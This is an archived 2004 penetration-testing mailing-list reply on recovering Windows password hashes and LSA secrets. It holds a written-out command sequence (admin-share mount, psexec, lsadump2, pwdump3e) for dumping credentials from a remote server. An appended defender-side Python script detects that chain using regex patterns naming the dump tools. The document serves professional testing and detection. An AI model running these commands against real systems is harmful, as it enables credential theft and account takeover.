Penetration Testing mailing list archives

Re: Cached NT/W2k passwords


From: Kurt Grutzmacher <grutz () jingojango net>
Date: Sun, 23 May 2004 14:05:54 -0700


> You can get the password of the currently logged in user with Cain.
> It's the easiest method to dump all the passwords in the system,
> including the passwords in the protected storage component of Windows.

Correct, but not complete. Abel (the remote part of Cain) only pulls the SAM table (pwdump) and LSA secrets (lsadump). It also requires that Abel be installed and running, which can be a boundary issue from a tester/client relationship. I like its additional features but, IMHO, it's a bit more cumbersome to install. I'm not a big fan of losing control over installation (point-and-click).

If you're trying to keep things off of a client's machine that could be used by a separate party (like Abel) then you're better off doing something like this:

net use z: \\server\c$ pw /u:administrator
copy lsadump2.exe c:\
copy dumplsa.dll c:\
psexec \\server c:\lsadump2
del z:\lsadump2.exe z:\dumplsa.dll
pwdump3e server

Yeah, you've got the admin password and it may have been insanely easy to get -- but you're not installing a listening package like Abel that could be controlled by an outsider. The only thing left on the remote machine is PSEXECSVC.EXE which can be done away with rather easily.

I think the original poster (and many others like us :-) want to find the cached Windows logon passwords. It used to be in lsass memory but an upcoming patch is going to "fix" it. It's got to be stored somewhere since XP/2003 must be backwards compatible.
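As an added, defender-side example that is not part of this post or thread: a small Python triage script that flags the three artefacts the sequence above leaves behind on the target (admin-share connection, PsExec service installation, a dump tool written to and executed from C:\) and alerts only when one host shows the whole chain. The event records are constructed samples, the field names assume an already-normalised log source, and the event IDs are the Vista-and-later Security/System log numbers, not the 2004-era ones.

```python
import re
from collections import defaultdict

# Constructed sample events (not real logs). "server" shows the full chain from
# the post; "ws01" shows ordinary activity that must not alert.
SAMPLE_EVENTS = [
    {"host": "server", "event_id": 5140, "share": r"\\*\C$", "src_ip": "10.0.0.5", "user": "administrator"},
    {"host": "server", "event_id": 4663, "object": r"C:\lsadump2.exe", "user": "administrator"},
    {"host": "server", "event_id": 7045, "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    {"host": "server", "event_id": 4688, "image": r"C:\lsadump2.exe", "parent": r"C:\Windows\PSEXESVC.exe"},
    {"host": "ws01", "event_id": 5140, "share": r"\\*\IPC$", "src_ip": "10.0.0.9", "user": "jdoe"},
    {"host": "ws01", "event_id": 7045, "service": "Spooler", "image": r"C:\Windows\System32\spoolsv.exe"},
]

TOOL_NAMES = re.compile(r"(lsadump2|dumplsa|pwdump)", re.IGNORECASE)
# \\<anything>\C$ or \\<anything>\ADMIN$ : the administrative shares used for "net use ... c$"
ADMIN_SHARE = re.compile(r"\\\\[^\\]+\\(?:[A-Z]\$|ADMIN\$)", re.IGNORECASE)
PSEXEC_SVC = re.compile(r"psexe", re.IGNORECASE)   # matches PSEXESVC and the post's PSEXECSVC.EXE

def classify(ev):
    """Return the indicator name a single event matches, or None."""
    eid = ev["event_id"]
    if eid == 5140 and ADMIN_SHARE.fullmatch(ev.get("share", "")):
        return "admin_share"                       # 5140: network share object accessed
    if eid == 7045 and PSEXEC_SVC.search(ev.get("service", "") + ev.get("image", "")):
        return "psexec_service"                    # 7045: a service was installed
    if eid in (4663, 4688) and TOOL_NAMES.search(ev.get("object", "") + ev.get("image", "")):
        return "dump_tool"                         # 4663: file written, 4688: process created
    return None

def detect(events):
    """Collect indicators per host; return (tags per host, hosts showing the full chain)."""
    per_host = defaultdict(set)
    for ev in events:
        tag = classify(ev)
        if tag:
            per_host[ev["host"]].add(tag)
    chain = {"admin_share", "psexec_service", "dump_tool"}
    tags = {host: sorted(t) for host, t in per_host.items()}
    alerts = [host for host, t in per_host.items() if chain <= t]
    return tags, alerts

if __name__ == "__main__":
    tags, alerts = detect(SAMPLE_EVENTS)
    for host in alerts:
        print(f"ALERT {host}: remote SAM/LSA dump chain observed {tags[host]}")
```

Any single indicator on its own (an admin-share mount, a PsExec service install) is common in legitimate administration, which is why the alert requires all three on the same host.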

